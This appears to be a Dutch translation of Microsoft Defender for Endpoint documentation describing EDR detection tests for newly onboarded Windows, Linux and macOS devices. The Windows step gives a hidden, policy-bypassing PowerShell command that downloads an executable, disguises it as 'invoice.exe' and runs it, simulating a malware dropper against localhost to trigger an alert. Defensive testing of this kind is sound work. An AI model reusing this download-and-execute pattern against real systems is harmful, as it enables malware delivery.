EDR-detectietest voor het controleren van de onboarding- en rapportageservices van het apparaat
- Windows 11, Windows 10 versie 1709 build 16273 of hoger, Windows 8.1 of Windows 7 SP1.
- Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2 en Windows Server 2008 R2 SP1.
- Linux
- macOS
- Microsoft Defender voor Eindpunt
- Microsoft Defender voor Eindpunt op Linux
Eindpuntdetectie en -respons voor Eindpunt bieden geavanceerde aanvalsdetecties die bijna in realtime zijn en actie kunnen worden uitgevoerd. Beveiligingsanalisten kunnen waarschuwingen effectief prioriteit geven, zichtbaarheid krijgen in het volledige bereik van een beveiligingsschending en reactieacties ondernemen om bedreigingen te herstellen.
Voer een EDR-detectietest uit om te controleren of het apparaat correct is onboarded en rapporteert aan de service. Voer de volgende stappen uit op het zojuist onboardingsapparaat:
Een opdrachtpromptvenster openen
Kopieer en voer de volgende opdracht uit bij de prompt. Het opdrachtpromptvenster wordt automatisch gesloten.
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
Als dit lukt, wordt de detectietest gemarkeerd als voltooid en wordt er binnen enkele minuten een nieuwe waarschuwing weergegeven.
- Scriptbestand downloaden naar een onboarded Linux-server
curl -o ~/Downloads/MDE-Linux-EDR-DIY.zip -L https://aka.ms/MDE-Linux-EDR-DIY
- De zip uitpakken
unzip ~/Downloads/MDE-Linux-EDR-DIY.zip
- Voer de volgende opdracht uit om het uitvoerbare scriptmachtiging te geven:
chmod +x ./mde_linux_edr_diy.sh
- Voer de volgende opdracht uit om het script uit te voeren:
./mde_linux_edr_diy.sh
- Na een paar minuten moet er een detectie worden gegenereerd in Microsoft Defender XDR. Bekijk de waarschuwingsdetails en de tijdlijn van de machine en voer de gebruikelijke onderzoeksstappen uit.
Download in uw browser, Microsoft Edge voor Mac of Safari, MDATP MacOS DIY.zip uit en pak het uit https://aka.ms/mdatpmacosdiy .
De volgende prompt wordt weergegeven:
Wilt u downloads op 'mdatpclientanalyzer.blob.core.windows.net' toestaan?
U kunt in Voorkeuren voor websites wijzigen welke websites bestanden kunnen downloaden.Klik op Toestaan.
Open Downloads.
U moet MDATP MacOS DIY kunnen zien.
Tip
Als u dubbelklikt op MDATP MacOS DIY, krijgt u het volgende bericht:
'MDATP MacOS DIY' kan niet worden geopend omdat de ontwikkelaar geen verificator kan zijn.
macOS kan niet controleren of deze app vrij is van malware.
[Verplaatsen naar prullenbak][Annuleren]Klik op Cancel.
Klik met de rechtermuisknop op MDATP MacOS DIY en klik vervolgens op Openen.
Het systeem geeft het volgende bericht weer:
macOS kan de ontwikkelaar van MDATP MacOS DIY niet verifiëren. Weet u zeker dat u het wilt openen?
Door deze app te openen, overschrijft u systeembeveiliging die uw computer en persoonlijke gegevens kan blootstellen aan malware die uw Mac kan schaden of uw privacy in gevaar kan brengen.Klik op Openen.
Het systeem geeft het volgende bericht weer:
Microsoft Defender voor Eindpunt - macOS EDR DIY-testbestand
De bijbehorende waarschuwing is beschikbaar in de MDATP-portal.Klik op Openen.
Binnen enkele minuten wordt een waarschuwing macOS EDR-testwaarschuwing gegenereerd.
Ga naar Microsoft Defender portal (https://security.microsoft.com/).
Ga naar de waarschuwingswachtrij .
De macOS EDR-testwaarschuwing toont ernst, categorie, detectiebron en een samengevouwen menu met acties.
Bekijk de waarschuwingsdetails en de tijdlijn van het apparaat en voer de reguliere onderzoeksstappen uit.
Als u problemen ondervindt met de compatibiliteit of prestaties van toepassingen, kunt u overwegen uitsluitingen toe te voegen. Zie de volgende artikelen voor meer informatie:
- Uitsluitingen configureren en valideren voor Microsoft Defender voor Eindpunt in macOS
- Actie ondernemen voor fout-positieven/-negatieven in Microsoft Defender voor Eindpunt
- Onderdrukkende regels beheren
- Indicatoren van inbreuk maken (IoC)
- Aangepaste detectieregels maken en beheren
Zie ook de handleiding voor beveiligingsbewerkingen van Microsoft Defender voor Eindpunt.